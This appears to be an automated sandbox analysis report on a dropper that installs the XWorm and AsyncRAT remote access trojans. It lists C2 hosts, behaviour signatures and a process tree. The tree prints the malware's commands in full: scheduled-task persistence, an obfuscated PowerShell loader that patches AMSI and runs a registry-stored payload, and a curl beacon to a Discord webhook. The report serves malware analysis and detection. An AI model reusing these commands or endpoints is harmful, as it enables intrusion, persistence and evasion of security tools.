Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-06-2024 05:51

General

  • Target

    Dropper Builder.exe

  • Size

    18.6MB

  • MD5

    c660fd4addbfaa81fac0a1f5d39cd000

  • SHA1

    7d1aaa224037b1ade30bb951ee04989b73d71a81

  • SHA256

    7e19aad8690328d389e5d037dd47c4fdcea7775ad69a0755c3e2eeba1df44ed8

  • SHA512

    a53d1608adb02d2b7ad7109490e1dce4b073cf622a291b52cea8794ba3c0296248fa87fb8305893cfb65d44f500afc7057375368eff2fd0a2e872a6420e8d5c9

  • SSDEEP

    98304:c+R1sVuWzOYBvDdXCxGSQjJQaoyqUIIdZicEMtECV:ckCzFvDdXCcSQLbqUISpEMW

Malware Config

Extracted

Family

xworm

C2

politics-fiber.gl.at.ply.gg:47430

Attributes
  • Install_directory

    %AppData%

  • install_file

    $77-scchost.exe

Extracted

Family

asyncrat

Botnet

Default

C2

environmental-blank.gl.at.ply.gg:25944

Attributes
  • delay

    1

  • install

    true

  • install_file

    $77-aachost.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Detect Xworm Payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Async RAT payload 1 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 9 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs
  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in System32 directory 10 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 7 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:612
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:380
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{1560c5bc-66e8-4bee-b24c-ba981a93522f}
          2⤵
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:436
          • C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe
            "C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"
            3⤵
            • Executes dropped EXE
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious use of AdjustPrivilegeToken
            PID:4652
            • C:\Windows\System32\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77-scchost" /tr "C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-scchost.exe"
              4⤵
              • Scheduled Task/Job: Scheduled Task
              PID:4988
              • C:\Windows\System32\Conhost.exe
                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                5⤵
                  PID:4564
            • C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe
              "C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"
              3⤵
              • Executes dropped EXE
              • Drops file in System32 directory
              • Modifies data under HKEY_USERS
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3836
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-aachost.exe"' & exit
                4⤵
                  PID:3712
                  • C:\Windows\System32\Conhost.exe
                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    5⤵
                      PID:912
                    • C:\Windows\system32\schtasks.exe
                      schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-aachost.exe"'
                      5⤵
                      • Scheduled Task/Job: Scheduled Task
                      PID:2200
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c ""C:\Windows\TEMP\tmpA9FB.tmp.bat""
                    4⤵
                    • Modifies data under HKEY_USERS
                    PID:1172
                    • C:\Windows\System32\Conhost.exe
                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      5⤵
                        PID:4912
                      • C:\Windows\system32\timeout.exe
                        timeout 3
                        5⤵
                        • Delays execution with timeout.exe
                        PID:4968
                  • C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe
                    "C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"
                    3⤵
                    • Executes dropped EXE
                    • Drops file in System32 directory
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of SetWindowsHookEx
                    PID:1048
              • C:\Windows\system32\lsass.exe
                C:\Windows\system32\lsass.exe
                1⤵
                  PID:668
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                  1⤵
                    PID:952
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                    1⤵
                      PID:732
                    • C:\Windows\System32\svchost.exe
                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                      1⤵
                        PID:996
                      • C:\Windows\System32\svchost.exe
                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                        1⤵
                          PID:1080
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                          1⤵
                            PID:1092
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                            1⤵
                            • Drops file in System32 directory
                            PID:1100
                            • C:\Windows\system32\taskhostw.exe
                              taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                              2⤵
                                PID:2828
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:HYFdDFDTpyLF{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$kzdYLOBIQUGoND,[Parameter(Position=1)][Type]$RFcHZzaONv)$kBhbHTEolUP=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+'l'+'e'+'c'+[Char](116)+''+'e'+'d'+[Char](68)+''+[Char](101)+'l'+'e'+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+[Char](77)+'e'+[Char](109)+''+[Char](111)+''+'r'+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+'u'+'l'+'e',$False).DefineType(''+[Char](77)+''+'y'+''+'D'+'el'+'e'+''+[Char](103)+''+[Char](97)+''+'t'+'e'+[Char](84)+''+[Char](121)+'p'+'e'+'',''+[Char](67)+''+[Char](108)+'a'+'s'+''+[Char](115)+''+[Char](44)+''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+','+''+[Char](83)+''+'e'+''+'a'+''+[Char](108)+'e'+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+'C'+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+'ut'+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$kBhbHTEolUP.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+'e'+''+[Char](99)+''+'i'+'a'+'l'+'N'+[Char](97)+'m'+'e'+''+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+'Si'+[Char](103)+''+[Char](44)+''+'P'+''+[Char](117)+'bli'+'c'+'',[Reflection.CallingConventions]::Standard,$kzdYLOBIQUGoND).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+'t'+[Char](105)+''+'m'+''+[Char](101)+','+'M'+''+[Char](97)+''+'n'+'a'+'g'+''+[Char](101)+''+[Char](100)+'');$kBhbHTEolUP.DefineMethod('I'+'n'+''+[Char](118)+''+'o'+''+'k'+''+[Char](101)+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+',H'+[Char](105)+''+[Char](100)+''+[Char](101)+'By'+[Char](83)+''+'i'+''+'g'+''+[Char](44)+''+'N'+''+'e'+'w'+'S'+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+'i'+'r'+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$RFcHZzaONv,$kzdYLOBIQUGoND).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+'m'+[Char](101)+',M'+[Char](97)+'n'+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $kBhbHTEolUP.CreateType();}$sweZnEGrkVLkX=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+'t'+''+'e'+''+'m'+''+[Char](46)+''+[Char](100)+'l'+'l'+'')}).GetType('Mi'+'c'+'r'+'o'+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+'2'+''+'.'+''+[Char](85)+''+'n'+''+[Char](115)+'af'+[Char](101)+''+[Char](78)+''+[Char](97)+'t'+[Char](105)+''+[Char](118)+''+[Char](101)+''+'M'+''+[Char](101)+'t'+[Char](104)+''+[Char](111)+''+'d'+'s');$EpMjWwMHmylFWv=$sweZnEGrkVLkX.GetMethod('Get'+'P'+'r'+[Char](111)+''+[Char](99)+'A'+[Char](100)+'d'+'r'+'e'+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'bl'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+'a'+'t'+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$BYqbBcnCXGWvuPcKYXw=HYFdDFDTpyLF @([String])([IntPtr]);$KrlzDjBxAwVYdEORYoHyUX=HYFdDFDTpyLF @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$beFIbIsMbYj=$sweZnEGrkVLkX.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+''+[Char](108)+'eH'+[Char](97)+''+[Char](110)+''+[Char](100)+'l'+'e'+'').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+''+'n'+''+[Char](101)+''+[Char](108)+''+[Char](51)+''+[Char](50)+'.d'+[Char](108)+'l')));$TQsUUPEUmAKZKo=$EpMjWwMHmylFWv.Invoke($Null,@([Object]$beFIbIsMbYj,[Object](''+[Char](76)+''+[Char](111)+'a'+'d'+'L'+[Char](105)+'b'+[Char](114)+'a'+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$jljYdLiNhUbrXalZm=$EpMjWwMHmylFWv.Invoke($Null,@([Object]$beFIbIsMbYj,[Object]('Vi'+[Char](114)+'tu'+'a'+''+'l'+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+'t'+''+'e'+''+'c'+''+[Char](116)+'')));$gWZHett=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($TQsUUPEUmAKZKo,$BYqbBcnCXGWvuPcKYXw).Invoke('am'+[Char](115)+''+[Char](105)+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'');$jKUEWHcKZfelKnHjH=$EpMjWwMHmylFWv.Invoke($Null,@([Object]$gWZHett,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+'a'+''+[Char](110)+''+'B'+''+[Char](117)+'f'+[Char](102)+''+[Char](101)+'r')));$tbryIxHVtp=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jljYdLiNhUbrXalZm,$KrlzDjBxAwVYdEORYoHyUX).Invoke($jKUEWHcKZfelKnHjH,[uint32]8,4,[ref]$tbryIxHVtp);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$jKUEWHcKZfelKnHjH,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jljYdLiNhUbrXalZm,$KrlzDjBxAwVYdEORYoHyUX).Invoke($jKUEWHcKZfelKnHjH,[uint32]8,0x20,[ref]$tbryIxHVtp);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+'F'+''+'T'+'WA'+'R'+'E').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+'st'+[Char](97)+''+[Char](103)+'er')).EntryPoint.Invoke($Null,$Null)"
                                2⤵
                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                • Drops file in System32 directory
                                • Suspicious use of SetThreadContext
                                • Modifies data under HKEY_USERS
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                • Suspicious use of WriteProcessMemory
                                PID:2840
                                • C:\Windows\System32\Conhost.exe
                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  3⤵
                                    PID:2020
                                • C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                                  C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                                  2⤵
                                  • Executes dropped EXE
                                  PID:4364
                                • C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                                  C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                                  2⤵
                                  • Executes dropped EXE
                                  PID:400
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                1⤵
                                  PID:1184
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                  1⤵
                                    PID:1248
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                    1⤵
                                      PID:1276
                                      • C:\Windows\system32\sihost.exe
                                        sihost.exe
                                        2⤵
                                          PID:2608
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                        1⤵
                                        • Drops file in System32 directory
                                        PID:1316
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                        1⤵
                                          PID:1428
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                          1⤵
                                            PID:1440
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                            1⤵
                                              PID:1448
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                              1⤵
                                                PID:1524
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                1⤵
                                                  PID:1616
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                                  1⤵
                                                    PID:1680
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                    1⤵
                                                      PID:1724
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                      1⤵
                                                        PID:1760
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                        1⤵
                                                          PID:1808
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                          1⤵
                                                            PID:1936
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                            1⤵
                                                              PID:1944
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                              1⤵
                                                                PID:2008
                                                              • C:\Windows\System32\svchost.exe
                                                                C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                                1⤵
                                                                  PID:2024
                                                                • C:\Windows\System32\spoolsv.exe
                                                                  C:\Windows\System32\spoolsv.exe
                                                                  1⤵
                                                                    PID:1756
                                                                  • C:\Windows\System32\svchost.exe
                                                                    C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                                    1⤵
                                                                      PID:2172
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                      1⤵
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:2240
                                                                    • C:\Windows\System32\svchost.exe
                                                                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                      1⤵
                                                                        PID:2308
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                        1⤵
                                                                          PID:2484
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                          1⤵
                                                                            PID:2492
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                            1⤵
                                                                              PID:2652
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                              1⤵
                                                                                PID:2776
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                                1⤵
                                                                                • Enumerates connected drives
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:2816
                                                                              • C:\Windows\sysmon.exe
                                                                                C:\Windows\sysmon.exe
                                                                                1⤵
                                                                                  PID:2844
                                                                                • C:\Windows\System32\svchost.exe
                                                                                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                                  1⤵
                                                                                    PID:2868
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                                    1⤵
                                                                                      PID:2876
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                      1⤵
                                                                                        PID:2996
                                                                                      • C:\Windows\system32\wbem\unsecapp.exe
                                                                                        C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                        1⤵
                                                                                          PID:3112
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                          1⤵
                                                                                            PID:3456
                                                                                          • C:\Windows\Explorer.EXE
                                                                                            C:\Windows\Explorer.EXE
                                                                                            1⤵
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                            • Suspicious use of SendNotifyMessage
                                                                                            PID:3572
                                                                                            • C:\Users\Admin\AppData\Local\Temp\Dropper Builder.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\Dropper Builder.exe"
                                                                                              2⤵
                                                                                              • Checks computer location settings
                                                                                              • Modifies registry class
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:2932
                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                3⤵
                                                                                                  PID:320
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1253936460533596222/A6HxzIjIDIKyWDj0ckcP1MgqmlK_CMtEmYhM4dwuWmPFk2q_02wySjZSHZuHPAmtdoBM" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
                                                                                                  3⤵
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:3224
                                                                                                  • C:\Windows\SysWOW64\curl.exe
                                                                                                    curl "https://discord.com/api/webhooks/1253936460533596222/A6HxzIjIDIKyWDj0ckcP1MgqmlK_CMtEmYhM4dwuWmPFk2q_02wySjZSHZuHPAmtdoBM" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
                                                                                                    4⤵
                                                                                                      PID:1204
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"
                                                                                                    3⤵
                                                                                                    • Checks computer location settings
                                                                                                    • Executes dropped EXE
                                                                                                    • Adds Run key to start application
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:3984
                                                                                                    • C:\Windows\System32\schtasks.exe
                                                                                                      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77-scchost" /tr "C:\Users\Admin\AppData\Roaming\$77-scchost.exe"
                                                                                                      4⤵
                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                      PID:4584
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"
                                                                                                    3⤵
                                                                                                    • Checks computer location settings
                                                                                                    • Executes dropped EXE
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:4576
                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"' & exit
                                                                                                      4⤵
                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                      PID:1980
                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                        schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"'
                                                                                                        5⤵
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:2972
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp9F0F.tmp.bat""
                                                                                                      4⤵
                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                      PID:664
                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        5⤵
                                                                                                          PID:4432
                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                          timeout 3
                                                                                                          5⤵
                                                                                                          • Delays execution with timeout.exe
                                                                                                          PID:2540
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"
                                                                                                      3⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                      PID:4280
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\$77-install.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\$77-install.exe"
                                                                                                      3⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:4940
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    "C:\Windows\system32\cmd.exe"
                                                                                                    2⤵
                                                                                                      PID:5084
                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        3⤵
                                                                                                          PID:2316
                                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                          wmic csproduct get UUID
                                                                                                          3⤵
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:408
                                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                          wmic csproduct get UUID UUID
                                                                                                          3⤵
                                                                                                            PID:1416
                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                        C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                        1⤵
                                                                                                          PID:3664
                                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                                          C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                          1⤵
                                                                                                            PID:3868
                                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                            1⤵
                                                                                                              PID:4024
                                                                                                            • C:\Windows\System32\RuntimeBroker.exe
                                                                                                              C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                              1⤵
                                                                                                              • Suspicious use of UnmapMainImage
                                                                                                              PID:676
                                                                                                            • C:\Windows\System32\RuntimeBroker.exe
                                                                                                              C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                              1⤵
                                                                                                                PID:4092
                                                                                                              • C:\Windows\system32\SppExtComObj.exe
                                                                                                                C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                                1⤵
                                                                                                                  PID:4808
                                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                                  C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                  1⤵
                                                                                                                    PID:3340
                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                    1⤵
                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                    PID:4876
                                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                                    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                    1⤵
                                                                                                                      PID:1168
                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                      C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                      1⤵
                                                                                                                        PID:2912
                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                        C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                        1⤵
                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                        PID:2404
